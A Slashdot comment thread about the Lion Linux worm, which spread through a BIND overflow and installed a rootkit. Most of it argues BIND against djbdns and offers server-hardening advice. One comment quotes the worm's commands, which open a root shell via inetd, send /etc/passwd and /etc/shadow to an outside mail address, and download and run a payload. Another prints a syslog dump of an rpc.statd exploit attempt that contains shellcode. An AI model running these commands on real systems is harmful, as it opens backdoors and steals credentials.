New Linux Worm 232
mspeedie writes "Seems Linux has very much arrive judging by the number of nasty virus starting to pop up. Check out the latest at:
Lion Worm Virus on Linux
" This is not a virus, its a worm that exploits a vulnerable bind to install a rootkit. Regardless, you should have tripwire or something running anyway.
Re:How is this a Linux problem? (Score:1)
But will it infect.... (Score:1)
Re:rootness and capabilities (Score:1)
Source (Score:1)
Re:Why is this such a big deal? (Score:1)
Spin Baby Spin! (Score:1)
Seems very biased to me... (Score:2)
Re:It can be nasty.... (Score:2)
And if you got rootkitted, how the hell are you going to know that? Unless you keep ps on a floppy?
Anyone else notice (Score:2)
Re:Shouldn't that be : (Score:2)
Could sombody de-worm my GNU
Thanks
Re:BIND is the problem, not Linux (Score:2)
For me, djbdns has never ever core dumped and updates it's secondaries with no problem. It has also never had a security hole, for what it's worth.
Try the support mailing list.
Unless you don't really care, in that case, niether do I.
Re:Use DJBDNS instead of BIND. (Score:2)
Well, djbdns isn't really Free. I can't patch it, add some security holes, and redistribute it as the original, like I can with BIND.
That is not 100% correct. See http://cr.yp.to/distributors.html [cr.yp.to]. The only restriction is on redistribution of djbdns. These restrictions are not to make himself rich (if anything, he will lose money on djbdns). The restrictions are so that djbdns stays useful, functional and compatible across all platforms.
BIND is the problem, not Linux (Score:5)
Tripwire? If you were a real admin you would look at the source for BIND, declare it garbage, and run djbdns [cr.yp.to] instead.
Run BIND on production servers? Not if my life depended on it. djbdns runs chroot()'d, non-root by default and even then the author still puts up a $500 reward for anyone who can find a security hole.
I'm so glad we modern admins have a choice. djbdns [cr.yp.to] is a real, safe, fast, and well documented alternative to BIND and if I were your boss I'd fire you for not switching.
Friends don't let friends run BIND!
Re:Tripwirelike product (Score:1)
Doesn't mean you don't have to pay for it.
Re:How is this a Linux problem? (Score:1)
Besides, unless this worm is taking advantage of some Linux specific exploit: it could just as easily target any other Unix, or even Cygwin.
Re:rootness and capabilities (Score:1)
Re:Worm (Score:3)
Whether or not BIND is an exploit depends on a 3rd party developer. Whether or not it's even running depends on who PACKAGED your version of Linux.
OTOH, you have NO CHOICE when it comes to WinDOS distributions. If Microsoft f*cks up, you have no where else to look. If Bughat f*cks up, you can look to Caldera, Mandrake, Debian, Slackware and Suse.
Re:Worm (Score:2)
:-)
Coincidence? (Score:2)
Maybe it's just coincidence, but last night, I had a very weird syslog event while I was pulling down email off my (Northpoint :-) ) DSL line. Copied below is a (very badly formatted) octal dump of the relevant section of the log:
________ : :
0000000 M a r 2 3 0 1 : 5 3 : 2 7
0000020 w a l k i e s - - M A R K
0000040 - - \n M a r 2 3 0 1 : 5 4
0000060 0 4 w a l k i e s i d e n t
0000100 d [ 1 2 2 8 6 ] : s t a r t e
0000120 d \n M a r 2 3 0 1 : 5 4 : 0
0000140 7 w a l k i e s \n M a r 2
0000160 3 0 1 : 5 4 : 0 7 w a l k i
0000200 e s s y s l o g d : C a n n
0000220 o t g l u e m e s s a g e
0000240 p a r t s t o g e t h e r \n M
0000260 a r 2 3 0 1 : 5 4 : 0 7 w
0000300 a l k i e s 1 7 3 > M a r 2
0000320 3 0 1 : 5 4 : 0 7 / s b i n
0000340 / r p c . s t a t d [ 1 6 4 ]
0000360 g e t h o s t b y n a m e e
0000400 r r o r f o r ^ X 367 377 277 ^ X
0000420 367 377 277 ^ Y 367 377 277 ^ Y 367 377 277 ^ Z 367
0000440 377 277 ^ Z 367 377 277 ^ [ 367 377 277 ^ [ 367 377
0000460 277 % 8 x % 8 x % 8 x % 8 x % 8 x
0000500 % 8 x % 8 x % 8 x % 8 x % 2 3 6
0000520 x % n % 1 3 7 x % n % 1 0 x % n
0000540 % 1 9 2 x % n 220 220 220 220 220 220 220 220 220
0000560 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220
*
0002160 220 220 220 1 300 353 | Y 211 A ^ P 211 A ^ H
0002200 376 300 211 A ^ D 211 303 376 300 211 ^ A 260 f 315
0002220 200 263 ^ B 211 Y ^ L 306 A ^ N 231 306 A ^
0002240 H ^ P 211 I ^ D 200 A ^ D ^ L 210 ^ A
0002260 260 f 315 200 263 ^ D 260 f 315 200 263 ^ E 0 300
0002300 210 A ^ D 260 f 315 \n M a r 2 3 0
0002320 1 : 5 4 : 0 7 w a l k i e s
0002340 307 ^ F / b i n 307 F ^ D / s h A 0
0002360 300 210 F ^ G 211 v ^ L 215 V ^ P 215 N ^
0002400 L 211 363 260 ^ K 315 200 260 ^ A 315 200 350 177 377
0002420 377 377 \n
0002423
________
Did someone try to h4x0r my laptop?
Schwab
Re:Coincidence? (Score:2)
Thank you very much for the heads up. I went to CERT's site, and found an example syslog entry almost identical to the one on my laptop. Fortunately, I already had the fixed rpc.statd (v0.9.1-1) installed on my Debian laptop.
I'll go update 'bind' now (assuming I bothered to install it).
Schwab
Re:It can be nasty.... (Score:2)
Re:/. presses about to fall over (too slanted!) (Score:2)
Right. And I suppose you're going to sit there and claim that you're never hypocritical or apply double standards. If you do, you just proved my point.
-"Zow"
partial rant, (Score:4)
This statement is really indicative of another thing: cluelessness. Running tripwire will tell someone that they have been cracked! Close the barn door Edith, the cows just escaped!
Maybe the "or something" alludes to the real solution; don't run BIND, run an up-to-date patched version of BIND, run snort, etc... Maybe he should have said, "Patch early, patch often." But nooooo! Run tripwire.
BTW, this worm is really no different than the ramen worm; similar concept, different exploit. What has gotten the attention of sysadmins is that they are seeing a sudden surge in traffic to port 53. These sysadmins are the target audience of SANS, and the sysadmins don't like someone messing with their DNS. I believe that is why the Global Incident Analysis Center (GIAC) of SANS changed their current threat level to yellow. This comment was posted on GIAC (note TCP, not UDP to port 53).
BTW, the n.g. comp.os.linux.security had a posting about this (didn't know it was lion) back on Tuesday. In that thread, the guy that got cracked found this (using strings on the rogue program)
echo '1008 stream tcp nowait root /bin/sh sh' >> /etc/inetd.conf
/etc/passwd >> 1i0n
/etc/shadow >> 1i0n
/.bash_history
killall -HUP inetd;ifconfig -a > 1i0n
cat
cat
mail 1i0nip@china.com < 1i0n rm -fr 1i0n
rm -fr
lynx -dump http://XXXXXXXX.XX.net/crew.tgz >1i0n.tgz
tar -zxvf 1i0n.tgz
rm -fr 1i0n.tgz;cd lib
./1i0n.sh
Re:rootness and capabilities (Score:2)
BRAKES
--
Re:Virii, OS acceptance, and making fun (Score:2)
The fact that the user has to click on a lengthy warning dialog to execute ILOVEYOU, which amounts to nothing more than a shell script (a WSH script, specifically).
Lion can be installed remotely without your ever knowing it, using a tool that ships with almost every Linux distro. But that's the admin's fault -- for running Linux.
--
Re:I was hit by this. (Score:2)
Paul
Re:Did you know... (Score:2)
Paul
Re:This is not a virus. (Score:2)
FWIW: There are more and more real viruses happening in the Windows world now that Win32's better understood by the bad guys.
Paul
Re:tripwire (Score:2)
As far as alerts go for public-facing services, generally you're better off following when the vendor/project team has released an update rather than trying to follow the mishmash of alerts, posts and filter the useful info out.
Paul
Re:Anyone else notice (Score:2)
Paul
Re:rootness and capabilities (Score:2)
If you want compartmentalization, ACLs, a privacy model, malcode capabilities, etc., then go to http://www.rsbac.org, patch your kernel and stop bitching.
Default configuration: Make your own distribution or script to turn everything on the way you like it. Neither is very difficult, and fixing is more productive than bitching.
Back to the task at hand- RSBAC could have stopped this worm, it's about time it went into a development kernel.
Paul
Re:This isnt a virus, a worm, or a trojan (Score:2)
http://www.tuxedo.org/~esr/jargon/html/entry/wo
http://www.tuxedo.org/~esr/jargon/html/entry/vi
As far as malicious code, it's actually pretty boring, there are at least two examples of the exploit the worm uses to propogate, but it's definitely a worm and it appears to be in the wild.
Paul
Re:This is not a virus. (Score:2)
It is useful to note that we're getting more executable Win32 viruses now though (as opposed to scripts and macros- which are still pervasive but were pretty much all that was coming out for a while.) Our malcode guys have been predicting that for a while though. What worries me is the ELF file infector stuff. Thank goodness we haven't reached critical mass for Linux binaries yet, as there's still time to build in protection.
Paul
Re:Invincible (Score:2)
Paul
Re:rootness and capabilities (Score:2)
Not everyone needs those (unlike brakes on a car), and just like a manual transmission, not everyone can operate one, so for Linux it's optional.
Sorry if you're used to fast food, some of us enjoy ordering quality food item-by-item to get the best meal, not just the same old Happy Meal.
If you want it enough, you'll install it, if you don't, then you don't have to. If you want to wait for someone to create a turnkey distribution you can do that too. Just don't whine like a little baby that someone else isn't doing everything for you.
Actually, the quality bar has been set to "if it doesn't do it out of the box, generally someone's put a hell of a lot of work into doing it and is willing to share it and support it if you take one step in their direction." That's a hell of a lot better than "If it doesn't do it out of the box, wait until the vendor decides to release a bug-ridden version of it and if they don't want to, then you don't get that."
Hold your breath waiting for MAC-based compartments in WindowsANYTHING, or anything else that looks sufficiently B-level to provide strong security.
You might like bloated "it's all in there no matter if it's necessary or not" software systems, but they're not condusive to security and it's best when security-minded people build security critical pieces of them instead of OS-minded people, so patching for RSBAC works very well for those of us who care about security that deeply. It also makes the code easier to check when it's diffs instead of intermingled with the base kernel code.
If you buy a 2 seater sports car, don't expect it to be good at off-roading. The power of Linux is in the fact that I can get anything from RSBAC security to high-powered general purpose clusters and run the same code on them all.
If you need a silly little box around the software to make you happy, then you shouldn't be looking at Linux, it's not about inside the box.
Back on topic: RSBAC actually solves the "I don't want the administrator to be able to trojan this machine" problem as well as is possible on general purpose hardware (you can go download the international patches if you want to add another layer- or I suppose you could pay someone to do it since you seem to be allergic to actually installing software- must be hell when those new Reader Rabbit things come out!) The only other systems that come close cost tens of thousands of dollars and/or are obsolete.
Must have really pained you to choose which options you wanted on your car, or are you just walking until somone figures out how to have leather and cloth seats at the same time?
Paul
Re:This isnt a virus, a worm, or a trojan (Score:2)
It does *not* appear to rootkit downstream infected machines, but it *does* move itself to other computers, which is what makes it a worm. Auto-exploit code is only a component of a worm if it automatically transfers itself to new machines. This code does that, therefore its a worm.
Replication if it infected "normal" programs would make it a virus, replication like this makes it a worm. Take away the self-replication and it's an exploit. All of these terms are well-defined, well-known and well-understood in the security and malcode communities.
In this case, the *worm* is the entire kit, and the exploit is a GLIBC 2.0 based executable called "bind" that's utilized by the worm to propogate via the TSIG overflow in BIND 8.2.x where x<3-REL.
"That system is left alone" is patently false in this case, since the downstream machine loads the smaller worm code and starts infecting machines of its own.
I dunno what you think a worm is, but the rest of
the community is sure that this is a worm. It's a boring worm, but it's definitely a worm.
Paul
rootness and capabilities (Score:4)
Re:Everybody should have seen it coming... (Score:3)
Caution: Now approaching the (technological) singularity.
They're called "viruses"... (Score:2)
I don't mean to split hairs, but the word "virii" makes my skin crawl, the same way "irregardless" or "it's" used possessively does...
I'll shut up now... :-)
-B
Re:They're called "viruses"... (Score:2)
Bullshit. It's wrong, annoying, and used only by people who either want to make other people think they're smart or just don't know any better.
A "somewhat archaic grammatical structure"?!? WTF are you talking about? You sound like Ash in Army of Darkness: "Your primitive brains can't comprehend things with alloys and molecules, and uh..."
So I have a choice between your opinion and those of two dictionaries. Hmmm, let me see... Yeah, I think you're right and both dictionaries are wrong! Uh huh. Any other words you care to invent that you would like to share?
Look it up. Links are in the original post.
-B
Re:Use DJBDNS instead of BIND. (Score:2)
Really, then try this. Install qmail/svscan on a system with sendmail installed. Then try to startup qmail using svscan without shutting down sendmail. Then watch your system load jump to 5+ and your system grind to a halt. And yes it is easy to get into this situation if for example you forget to shutdown sendmail during a transition to qmail or you accidently forget to remove sendmail from the list of daemons started up at boot.
Re:regardless... (Score:2)
http://64.252.15.27
Re:This is not a virus. (Score:2)
Actually as a techie, I view a lot of Slashdot's population in exactly the same way. It's a tool, people -- not a religion.
Tools chip, break, and fall apart. All tools do.
Simon
Re:Virii, OS acceptance, and making fun (Score:2)
Yeah, but that's the equivalent of saying no nation is free of diseases. There are some places in the world you'd rather be (America, Europe, Japan, etc.) than others (Somalia, Haiti, Ghana). Better hospitals and better sanitation would be good reasons to prefer the more powerful industrialized nations. If anyone's been claiming that Linux (and UNIX in general) is invulnerable, then they really need to ask themselves why there even is an effort to make systems like OpenBSD. However, saying that one outbreak of a worm makes Linux on the same level as Windows in terms of security is like claiming that the LA riots made America equivalent to Palestine in terms of social stability.
Yes, there are Linux worms. Yes, there are Linux root-kits, designed to exploit well-known bugs in programs distributed with certain Linux distributions. Does that mean that Linux is anywhere near as vulnerable as Windows? I don't think so. Security is still a reason to switch from Windows to Linux, and a knowledgeable person who actually cares about security can put together a nearly bulletproof box with a little effort.
Could you say the same for Windows? Maybe, but it's a lot harder and takes away a lot more functionality to do so because there are fewer alternative solutions to replace the builtin solutions. (No IIS, no "Windows Networking", no Outlook, no IE, etc.)
Automatic upgrade support needed (Score:2)
Re:Solutions (Score:2)
Another reason I'm not worried? I'm running a chrooted bind. The feature is still labelled as "experimental" in the branch I'm running, but it works very well. There are instructions all over the net. Even if BIND is exploited, they won't get far.
The number of port 53 scans I've gotten in recent weeks should frighten the pants off anyone who is running an unpatched BIND. I would not be surprised if we see a major DDoS soon.
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
YES! (Score:4)
Oh, wait. I'm one of those Linux-using bastards.
Why exactly are BIND and Sendmail known for holes? (Score:2)
Re:Tripwirelike product (Score:4)
Tripwire has split into a commerical version and an open source version.
--
Re:Worm (Score:3)
However, my argument still stands because most users don't consider their kernel to be their OS, and they consider their Operating System to be Linux and not GNU (which it really is as debian HURD developers will quickly point out to you). So the difference is largely a misnomer...
My point here would be that desktop users may want choices, but more importantly, they want intelligent default choices to be made for them by their distributions so they don't ever have to worry about it. This includes not defaulting to buggy software or worm vulnerable builds of BIND. A good OS will instill confidence in the user by making good default choices on their behalf (which Windows/Mac do well) and allowing them to inspect and change them if they desire (which linux does well). Both of these are the responsabilty of the distro if linux is ever to move over to the desktop.
-pos
The truth is more important than the facts.
Worm (Score:5)
If linux is just for hackers, then fine. BUT, if you have ever expressed that you want linux to be the default instead of Mac, Windows or whatever then you owe it to yourself to be realistic about why most people use computers. It's probably different than why you do, and it's probably because they just want software that does a job for them. They don't care how it works and they shouldn't have to. We don't make fun of people who don't know what happened when their car breaks. Sure... it's respectable to know why, but it's not a sin not to.
And second...
Regardless, you should have tripwire or something running anyway
That is a total cop-out! I'm sure every one here knows that a windows user would get absolutly jumped on if they said something like that about windows security. "Security hole in windows? you should be running antivirus software. It's your own fault."
flame on.
-pos
The truth is more important than the facts.
Re:regardless... (Score:2)
These "people" are you and me, the admins. This problem is clearly the admin's fault.
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-b
There is very little truth in your statement these days. On most recent distros you have to choose explicitly to be a server. If you don't, you have to explicitly choose to install and enable BIND. Truth be known, I doubt there are very many KDE workstations out there running named.
No, the blame lies in lazy (or nonexistant?) sysadmins. Let's face it; why is your server running BIND if it doesn't need to (you chose it from the install...)? If the machine is a nameserver, then when the advisory came out in January, did you patch up right away? If not, WHY NOT?. The vendors got updated RPMs and whatnot out fairly quickly.
For the non-existant admin problem, things like the Redhat network [redhat.com] will help tremendously.
Not trying to flame here, but your ranting sounds like the parents who blame high-school shootings on video games and movies, when they should be pointing in the mirror. To all the slack admins out there: Enough of this sh*t. Suck it up and do your damn jobs.
FWIW, installs are getting very savvy these days, taking up the slack for the poor job a lot of admins out there are doing; check out RH's latest beta (wolverine?) install - it does ipchains config during the install.
Re:How is this a Linux problem? (Score:2)
So unless you're a Linux user, or an X86 BSD user who's so whacked out he's running a linux binary of bind, you aren't affected by this worm.
Re:This is not a virus. (Score:2)
Nope, that's a trojan. Here's a quick explaination of the different terms for malicious code:
Trojan Horse ("Trojan") A Trojan is a standalone program that the user is tricked into running, which will in turn do bad things.
Virus. A virus is a program that attaches itself (infects) executables- usually anything that's ran while the virus is in memory. When an infected program is executed on a system that does not already have the virus in memory, it will usually load itself into memory for the purpose of infecting yet another system. They really haven't been seen much in recent years, as it's too much hassle and requires much more intelligence than other malicious programs. I'm sure a good portion of the slashdot audience will remember viruses such as Michaelangelo, Dark Avenger, PC-Stoned!, etc. (I was hit by Michaelangelo on it's second run-around)
Worms. A worm is any malicious program that propogates itself directly to other machines (usually via a network) whereas a virus relies on the execution of an infected program, and a trojan relies on execution of itself.
I hope that clears it up :)
Re:This is not a virus. (Score:2)
Hence the usefulness of quoting.
Tripwire (Score:4)
Anyone here a falsetto? (Score:4)
The mighty network
The Lion creeps tonight
All together now!
In the network
The mighty network
The Lion creeps tonight
-drin
Feh (Score:2)
If you do have a domain, don't run bind. It's in the same hole-a-week club as the FTP servers and Sendmail. Don't run bind.
If you absolutely must run bind, get the latest one, compile it static and run it chrooted as a user/group specifically created JUST to run bind.
Next week's class: Don't run FTPD.
Well... (Score:2)
Well then you're not running bind are you? Maybe I should have said Bind.
I think my message here is don't run Bind. You know what I'm saying?
Re:Tripwirelike product (Score:2)
IIRC Tripwire is GPL now. But in any case I prefer AIDE [cs.tut.fi] myself.
Re:rootness and capabilities (Score:2)
Re:Use DJBDNS instead of BIND. (Score:2)
IIRC, Dan really dislikes syslog, so this may not be far from the truth.
Re:no, tripwire should not be a necessity (Score:2)
This is not a perfect world. Just because you do not know of any exploitable root holes in sshd, telnetd, apache, etc today, does not mean that one will not be found tomorrow.
It is not uncommon for exploits to be discovered and traded in the black-hat community for days, months or even years before being made public.
To believe that you will not be targeted by 'real crackers' because you are not an interesting target is a naive and dangerous assumption.
Bad code is bad code, diversity is a red herring. (Score:2)
Competing apps should continue to compete, but badly written monolithic software that requires root access and is a long-running source of exploits (BIND and sendmail come to mind) should be gotten rid of, not kept around for the sake of 'diversity'.
The reason that DJBDNS is not exploited where BIND is is not because one is more popular, but because BIND is written so badly that nothing short of throwing it away and starting from the ground up (as DJBDNS has done) will fix it.
Use DJBDNS instead of BIND. (Score:5)
There are way to many machines running full services when only one or two listening processes are really needed, if that.
Re:Why exactly are BIND and Sendmail known for hol (Score:5)
Both Sendmail and BIND suffer from the same basic problem- they are huge monolithic programs that must be executed as root to perform their intended duties.
Why is qmail secure? The reason I started the qmail project was that I was sick of the security holes in sendmail and other MTAs. Here's what I wrote in December 1995:
As it turned out, fourteen security holes [slashdot.org] were discovered in sendmail in 1996 and 1997.I followed seven fundamental rules in the design and implementation of qmail:
sendmail treats programs and files as addresses. Obviously random people can't be allowed to execute arbitrary programs or write to arbitrary files, so sendmail goes through horrendous contortions trying to keep track of whether a local user was ``responsible'' for an address. This has proven to be an unmitigated disaster.
In qmail, programs and files are not addresses. The local delivery agent, qmail-local, can run programs or write to files as directed by ~user/.qmail, but it's always running as that user. (The notion of ``user'' is configurable, but root is never a user. To prevent silly mistakes, qmail-local makes sure that neither ~user nor ~user/.qmail is world-writable.)
Security impact: .qmail,
like .cshrc and .exrc and various other files,
means that anyone who can write arbitrary files as a user can execute
arbitrary programs as that user. That's it.
A setuid program must operate in a very dangerous environment: a user is under complete control of its fds, args, environ, cwd, tty, rlimits, timers, signals, and more. Even worse, the list of controlled items varies from one vendor's UNIX to the next, so it is very difficult to write portable code that cleans up everything.
Of the twenty most recent sendmail security holes, eleven worked only because the entire sendmail system is setuid.
Only one qmail program is setuid: qmail-queue. Its only purpose is to add a new mail message to the outgoing queue.
The entire sendmail system runs as root, so there's no way that its mistakes can be caught by the operating system's built-in protections. In contrast, only two qmail programs, qmail-start and qmail-lspawn, run as root.
Even if qmail-smtpd, qmail-send, qmail-rspawn, and qmail-remote are completely compromised, so that an intruder has control over the qmaild, qmails, and qmailr accounts and the mail queue, he still can't take over your system. None of the other programs trust the results from these four.
In fact, these programs don't even trust each other. They are in three groups: qmail-smtpd, which runs as qmaild; qmail-rspawn and qmail-remote, which run as qmailr; and qmail-send, the queue manager, which runs as qmails. Each group is immune from attacks by the others.
(From root's point of view, as long as root doesn't send any mail, only qmail-start and qmail-lspawn are security-critical. They don't write any files or start any other programs as root.)
I have discovered that there are two types of command interfaces in the world of computing: good interfaces and user interfaces.
The essence of user interfaces is parsing: converting an unstructured sequence of commands, in a format usually determined more by psychology than by solid engineering, into structured data.
When another programmer wants to talk to a user interface, he has to quote: convert his structured data into an unstructured sequence of commands that the parser will, he hopes, convert back into the original structured data.
This situation is a recipe for disaster. The parser often has bugs: it fails to handle some inputs according to the documented interface. The quoter often has bugs: it produces outputs that do not have the right meaning. Only on rare joyous occasions does it happen that the parser and the quoter both misinterpret the interface in the same way.
When the original data is controlled by a malicious user, many of these bugs translate into security holes. Some examples: the Linux login -froot security hole; the classic find | xargs rm security hole; the Majordomo injection security hole. Even a simple parser like getopt is complicated enough for people to screw up the quoting.
In qmail, all the internal file structures are incredibly simple: text0 lines beginning with single-character commands. (text0 format means that lines are separated by a 0 byte instead of line feed.) The program-level interfaces don't take options.
All the complexity of parsing RFC 822 address lists and rewriting headers is in the qmail-inject program, which runs without privileges and is essentially part of the UA.
Keep It Simple, Stupid
Re:It can be nasty.... (Score:2)
"One World, one Web, one Program" - Microsoft promotional ad
Re:How is this a Linux problem? (Score:2)
The correct way to respond to this is "we've found a problem now lets make sure this problem doesn't happen again". I want to be proud of linux, I want linux to be a great operating system, that's not going to happen as long as we, conctrate more on blaming others for their mistakes and downplaying ours, then working on solutions.
This comment in particular bothers me.
Why should I need to run tripwire or any security software? If an OS is secure an idiot should be able to administer it and not worry about worms/backdoors/viruses.I like the slogan "secure by default".
I'm a computer scientist, not a writer so no comments on the grammer or spelling please.
Re:rootness and capabilities (Score:2)
I'm hoping that you mean Linux security, since this isn't true at all for many other UNIX OSes. For Linux, I think the security is good enough for what it is, when it is used right. The problem is that many applications and servers don't use it right. POSIX.1e-style capabilities (see Linux-privs - POSIX.1e Capabilities for Linux, http://www.sourceforge.net/projects/linux-privs/ [sourceforge.net]) are probably the answer. A more legitimate qualm with the *nix model is that it is coarse-grained. I think at least a handful of UNIX OS's have responded with support for Access Control Lists, which provide more fine-grained file access (see Extended Attributes and Access Control Lists for Linux, http://acl.bestbits.at [bestbits.at]).
The X Window System catches a lot of criticism, some of it well-deserved. Most of it, however, is purely inane. It works very well, all things considered. Most of the technological deficiencies (i.e., mainly rendering technology) are resolved with modern extensions. Naturally, there are better ways to do it. We could have a much better architecture. But that's all hindsight. What we're looking at is not a transition that would be based on advantages, but on disadvantages. Until the limitations of the X Window System outstrip the convenience of using what's already there and well-supported, we have X. But Xfree86 is good enough for now. There might be alternatives in the future (Berlin, http://www.berlin-consortium.org/ [berlin-consortium.org]).
I'm stumped. You determine that you need the CLI for some task while you're in the GUI. What better interface can you get than actually getting the CLI in the GUI? (Which is what Xterm does for you.)
They seem to have everything I need and want, and more. Filename completion (with cycling through potential matches), redirection (especially with file descriptors, as in bash), good line editing, conditions and looping, scripting, ... Maybe I'm thinking inside the box, but I can't think of anything that I've needed to do that hasn't been made easy (if not trivial) by some shell.
Well, it's not as if every UNIX uses the same file system. I don't understand this claim, really. Are you arguing against heirarchical file systems or against the file systems themselves?
It performs very well for me, as do Mozilla (http://www.mozilla.org [mozilla.org]) and Konqueror (Konqueuror [konqueror.org]). There's a lot of hype around Opera (Opera [opera.com]), but I've never tried it. There are particular deficiencies in each of these, of course, but most of them perform the task of web browsing well enough. Not to forget, of course, Lynx (Lynx [browser.org]).
Anyway, there are legitimate issues. Standardized package management on Linux would be nice, ACLs/Capabilities would be nice... And I'm always up for a new Window Manager or Desktop Environment. I use Sawfish/GNOME (Sawfish, http://sawmill.sourceforge.net/ [sourceforge.net]; GNOME, http://www.gnome.org/ [gnome.org]). But, eh, keep complaining: anything that gets me new toys to play with can't be too bad.
/. presses about to fall over (too slanted!) (Score:3)
Re:tripwire (Score:2)
For single-vendor products (say Windows or Solaris), you can at least pretend that the vendor is a single source of information. The job that MS has done (shit poor) is one of the big reasons they get complained about so much.
But Linux has no single source of information, no single point of contact, and so forth. The best bet in this case is to run a major distribution (say RedHat, for the sake of argument), and check their web sites.
Is that a very good answer? Not really--it's only as good as the least of the Unix vendors. HP, for instance, patches security holes and the like so aggressively that even usenet is seldom ahead of them. Sun, on the other hand, is much slower, as is RedHat. Microsoft is appalling.
NO operating system has a single point of information that's up to date, unfortunately. The decentralised nature of Linux makes it worse than most (boo, hiss! He said something bad about linux!!!!
Bottom line is this: If you're going to run *ix of any flavour, get "the Unix Administrator's Handbook" (Evi Nemeth et. al.) and start reading usenet. And depending on your need for security (i.e. how much data will you lose WHEN you get hacked), read at least the vendor's web site but ideally (sigh!) the sites for the individual services. wu-ftpd sendmail, bind, and so on.
Yeah, it's a drag. That's security these days.
If you want proper security and you're not willing to unattach yourself from the 'net, then consider running OpenBSD, possibly on a cheap P-166 or something like.
tripwire (Score:4)
I'm so glad to see that CmdrTaco is promoting the proliferation of Linux into the community of average (read: "most") computer users with such a supportive, nurturing, and positive comment such as this. The arrogant tone of the comment makes me want to advise all of my non-expert computer using friends to download Mandrake, install it with no help from a Linux expert (it's so easy you don't need one anyway), and then proceed to use and learn it without any help from anyone, since it's so easy and intuitive. And, of course they'll all know to install tripwire "or something" because it's just that obvious.
Thanks again, CmdrTaco; you are a true representative of the Linux community in everything you say and do.
Re:Use DJBDNS instead of BIND. (Score:2)
This implies that the small utilities do that one thing really well. Well, I suppose svscan does one thing really well: generate MB/sec of error messages when it sees something it doesn't like, something trivial like a wrongly-named directory or a rightly-named directory in the wrong place. Seriously, it's like it was coded to stress-test syslog so it has zero error checking...
--
News for geeks in Austin: www.geekaustin.org [geekaustin.org]
Re:Question from a total newbie (Score:2)
See my "bastille" comment a few posts up. If you're using a redhat-derivative (RH, Mandrake, etc.), look in /etc/init.d or /etc/rc/init.d for the shell scripts that turn things on and off (e.g. /etc/init.d/named stop). Editing /etc/inetd.conf or /etc/xinetd.conf to comment out or remove the ability of the inetd-superserver to start up a connection to service X is another approach. Also see the program "ntsysv" on RH derivatives that gives you easy access to the "what starts on boot" list (hint: you can safely uncomment most of that list :) ). Note that some services (e.g. bind) run on their own continuously and some run on an as-needed, connection-oriented basis from (x)inetd (e.g. telnet, ftp) and some can run either way (ftp, ssh), the exact methods for disabling them depend...
If you have an always on connection, consider getting a personal firewall (there are bazillions of them, I've had good luck with the Linksys (linksys.com) series of products, buy.com has good (sub $100 for some models) prices on them). Even if you end up ditching linux it'll make your windows/whatever boxen on the home lan more secure.
Long term, get yourself a good book on unix administration (the armadillo book from o'reilly is a good bet (author = aeleen frisch iirc)). Read the docs on the Linux Documentation Project, particularly the book-length opus on security and system performance tuning. (www.redhat.com/mirrors/LDP is usually the mirror I use, I _think_ the home url is www.linuxdoc.org). I know it seems like a mountain of information but give yourself 6 months or so and it'll all seem clear. (plus you can get a stable, reasonbly lucrative job doing it if you devote enough time to becoming an admin to do it well).
--
News for geeks in Austin: www.geekaustin.org [geekaustin.org]
regardless... (Score:5)
You probably shouldn't be running bind (or anything else). Linux's security problems are almost always created by people leaving stuff up/on/open when they don't need to.
If you're a newbie, here's a partial list of things you don't need to install or have running on your new workstation: bind/named, any form of mail server (esp. sendmail), atd, smbd/nmbd (samba), inetd, any form of ftp daemon (wuftpd, et al.), NFS/NIS/portmap, basically anything that provides a service to the outside world. Machines on "always-on" connections and not behind firewalls are of course the most vulnerable...
The best policy is offering nothing, and only selectively opening up services as you need to. If you do have a machine that needs to provide a service, try to understand the service and the idiosyncracies of the server program before you offer it, and keep tabs on updates...
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-by -default-installations" thought here...
--
News for geeks in Austin: www.geekaustin.org [geekaustin.org]
Re:regardless... (Score:5)
Look into the Bastille project (search freshmeat). It's intended to run on a virgin install IIRC, fixes security holes and tells you what it's doing and why.
--
News for geeks in Austin: www.geekaustin.org [geekaustin.org]
Shouldn't that be : (Score:4)
--
LION worm HOWTO (Score:2)
a) basic server security concepts;
b) your distros recent upgrade/patches (for the last two months);
c) reasons to run bind and how to do it safely.
Here's how to make your machine vulerable to LION:
1) Install a Linux distro.
2) Install bind, but make sure you don't install a recent version! Recent versions won't let LION in!
3) Don't install any of your distos security updates/patches.
4) Finally, connect this machine directly to the internet w/o a firewall -- it's crucial that people on the 'net be able to access your nameserver.
If you follow all these steps, your Linux machine is vulnerable to the "Lion" worm. If your Linux machine does not get infected, please review all the above steps and try again.
Re:tripwire (Score:2)
But here's my question, and what I hope you (or some other kind soul) will point me to: to me, as you suggested, it isn't "that obvious" why my machine may be insecure in oh so many ways. If I decide to turn on a bunch of other services, for example, my system will probably be exploitable as all hell. But where's the best place to find out about all this? Do I need to go to the web page for my ftp daemon, and another web page for sendmail, and some other web page for security alerts, and so on and so forth? Or are there a few pages that are pretty good about keeping your box secure?
After I'm done securing my system, I'll go fix those Netscape fonts. Should be pretty easy....
Re:rootness and capabilities (Score:2)
That is why it sucks, because it is too coarse grained.
The X Window System catches a lot of criticism, some of it well-deserved.
The biggest problem with X-windows is that it requires a powerful and intelligent terminal which then is treated like a dumb device. OS X has improved on this. (I gave up on berlin when they spent a few months implementing alpha transparency.)
What better interface can you get than actually getting the CLI in the GUI?
The CLI is completely unaware that there is a GUI out there. See XMLterm for the proper way to create a CLI inside a graphical user interface.
They seem to have everything I need and want, and more.
The main shells are missing a ton of things. Here's a simple one: Not remembering recently used files without full path qualification (something norton commander supported ten years ago). Here's another one: default configuration often sucks. I've used many and the default shell often has file completion off and history off. Not to talk about the whole backspace/delete rigamarole. Imagine what you would say if Microsoft Word started with the delete key disabled...
File system sucks
Are you arguing against heirarchical file systems or against the file systems themselves?
What I'm refering to here is the lack of user defined attributes on the file system, such as "this file can only be opened with application XYZ". Mainframes had those in the 60's, WinNT has user defined attributes, how long until *nix supports those by default?
But, eh, keep complaining: anything that gets me new toys to play with can't be too bad.
That's the point. Create an itch, then address it.
Re:rootness and capabilities (Score:2)
Ah ok. That makes it alright then.... (NOT)
If you want compartmentalization, ACLs, a privacy model, malcode capabilities, etc., then go to http://www.rsbac.org, patch your kernel and stop bitching.
Predictable. The usual copout of the Linux user: Just download pacakge XYZ.
Yeap, when you buy a car and it has no breaks, you don't go to the dealer and complain. No you simply walk over to Napa spare parts and download some new brakes. After all why should one assume that things should work out of the box?
